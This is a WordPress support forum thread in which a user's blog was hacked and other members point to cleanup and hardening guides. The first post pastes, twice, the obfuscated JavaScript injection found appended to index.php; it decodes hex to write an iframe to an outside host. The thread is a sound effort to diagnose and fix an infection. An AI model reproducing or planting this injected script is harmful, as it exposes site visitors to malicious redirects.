Forums

WordPress › Support » How-To and Troubleshooting

the "check_content" hack (9 posts)

  1. Bonusball
    Member
    Posted 2 years ago #

    My blog was acting weird this afternoon. In fact it was skipping to the bottom of the page. I thought it was my browser.

    I looked at the code and saw there was a broken javascript function down there.

    </html><script>c46d8e='';r34077061db=document;r34077061db.write('<scr'+'ipt>function rf697c5(re40086){return e'+c46d8e+'val(re40086); }</scr'+'ipt>'); function c461134c94r11797(r864cd56e362){ var r171afc0f9=16; var d06='';return (rf697c5('pa'+d06+'rseInt')(r864cd56e362,r171afc0f9));}function rc419f0cdaed(r6dd7f24e03){ function rf59cee9(){var ra5f9b=2;return ra5f9b;} var r7aae136='';rb7d2a3653f6='fromCh';rd55dd87935=String[rb7d2a3653f6+'arCode'];for(r837a8d5035=0;r837a8d5035<r6dd7f24e03.length;r837a8d5035+=rf59cee9()){ r7aae136+=(rd55dd87935(c461134c94r11797(r6dd7f24e03.substr(r837a8d5035,rf59cee9()))));}return r7aae136;} var r4c2a3ca6ba='3C7363726970743E69662821'+c46d8e+'6D796961'+c46d8e+'297B646F63756D656E742E777269746528756E65736361'+c46d8e+'7065282027253363253639253636253732253631'+c46d8e+'253664253635253230253665253631'+c46d8e+'253664253635253364253633253334253336253230253733253732253633253364253237253638253734253734253730253361'+c46d8e+'25326625326625373425363525373225363925373325373425366625373225363925366525363325326525363325366625366425326625373425373325326625363925366525326525363325363725363925336625363325366625363425363925366526253237253262253464253631'+c46d8e+'253734253638253265253732253666253735253665253634253238253464253631'+c46d8e+'253734253638253265253732253631'+c46d8e+'253665253634253666253664253238253239253261'+c46d8e+'253334253334253337253333253239253262253237253331'+c46d8e+'253331'+c46d8e+'253632253633253339253635253332253237253230253737253639253634253734253638253364253339253230253638253635253639253637253638253734253364253334253339253337253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c46d8e+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c46d8e+'2536642536352533652729293B7D7661'+c46d8e+'72206D796961'+c46d8e+'3D747275653B3C2F7363726970743E';r34077061db.write(rc419f0cdaed(r4c2a3ca6ba));</script><script>check_content()</script>

    i suspected an errant plugin. I googled and found this

    http://forums.digitalpoint.com/showthread.php?t=874041

    the post doesn't make a lot of sense, but I took a peek at recently modified files on the server, and found that index.php was modified.

    Sure enough:

    <?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?><script>c46d8e='';r34077061db=document;r34077061db.write('<scr'+'ipt>function rf697c5(re40086){return e'+c46d8e+'val(re40086); }</scr'+'ipt>');  function c461134c94r11797(r864cd56e362){ var r171afc0f9=16; var d06='';return (rf697c5('pa'+d06+'rseInt')(r864cd56e362,r171afc0f9));}function rc419f0cdaed(r6dd7f24e03){ function rf59cee9(){var ra5f9b=2;return ra5f9b;} var r7aae136='';rb7d2a3653f6='fromCh';rd55dd87935=String[rb7d2a3653f6+'arCode'];for(r837a8d5035=0;r837a8d5035<r6dd7f24e03.length;r837a8d5035+=rf59cee9()){ r7aae136+=(rd55dd87935(c461134c94r11797(r6dd7f24e03.substr(r837a8d5035,rf59cee9()))));}return r7aae136;} var r4c2a3ca6ba='3C7363726970743E69662821'+c46d8e+'6D796961'+c46d8e+'297B646F63756D656E742E777269746528756E65736361'+c46d8e+'7065282027253363253639253636253732253631'+c46d8e+'253664253635253230253665253631'+c46d8e+'253664253635253364253633253334253336253230253733253732253633253364253237253638253734253734253730253361'+c46d8e+'25326625326625373425363525373225363925373325373425366625373225363925366525363325326525363325366625366425326625373425373325326625363925366525326525363325363725363925336625363325366625363425363925366526253237253262253464253631'+c46d8e+'253734253638253265253732253666253735253665253634253238253464253631'+c46d8e+'253734253638253265253732253631'+c46d8e+'253665253634253666253664253238253239253261'+c46d8e+'253334253334253337253333253239253262253237253331'+c46d8e+'253331'+c46d8e+'253632253633253339253635253332253237253230253737253639253634253734253638253364253339253230253638253635253639253637253638253734253364253334253339253337253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c46d8e+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c46d8e+'2536642536352533652729293B7D7661'+c46d8e+'72206D796961'+c46d8e+'3D747275653B3C2F7363726970743E';r34077061db.write(rc419f0cdaed(r4c2a3ca6ba));</script><script>check_content()</script>

    I replaced the header, but does anyone know how this might have happened, or how I can prevent it?

  2. Bonusball
    Member
    Posted 2 years ago #

    I also see he's been in

    /wp-content/index.php

  3. Bonusball
    Member
    Posted 2 years ago #

    also wp-admin/index.php

    Has anyone else ever seen this hack?

  4. prettyboymp
    Member
    Posted 2 years ago #

    Can you provide a list of plugins your running and who your hosting provider is?

  5. Rev. Voodoo
    Volunteer Moderator
    Posted 2 years ago #

    that looks like a hack to me!

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    And when you're done:
    http://codex.wordpress.org/Hardening_WordPress

    all good reading there. Seems lately, a lot of people have been having rogue files loaded to their server that allows writing to WP file.

    Best way to fin the files is with your access logs (hopefully you have access to them or can talk to your host)

    Find an altered file. Note the timestamp. Check your access logs for the time/date that the file was altered. See what file is accessing the altered file. Delete it.

    Also follow all the cleaning steps. Change your passwords after all is clean. ALL passwords. site/db/ftp

  6. Bonusball
    Member
    Posted 2 years ago #

    Thanks. It happened again this morning, I am trying to clean this up.

  7. Rev. Voodoo
    Volunteer Moderator
    Posted 2 years ago #

    yup....you have to find the source...or it's just gonna keep coming back..

    Good luck! I hated going through that

  8. Bonusball
    Member
    Posted 2 years ago #

    I have a few blogs hosted on my server, 2 or 3 of them were hacked this way.

    Here's a great post about what to do when it happens:

    http://www.snipe.net/2010/01/when-wordpress-gets-hacked/

  9. Rev. Voodoo
    Volunteer Moderator
    Posted 2 years ago #

    that is a pretty good link...bookmarked!

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags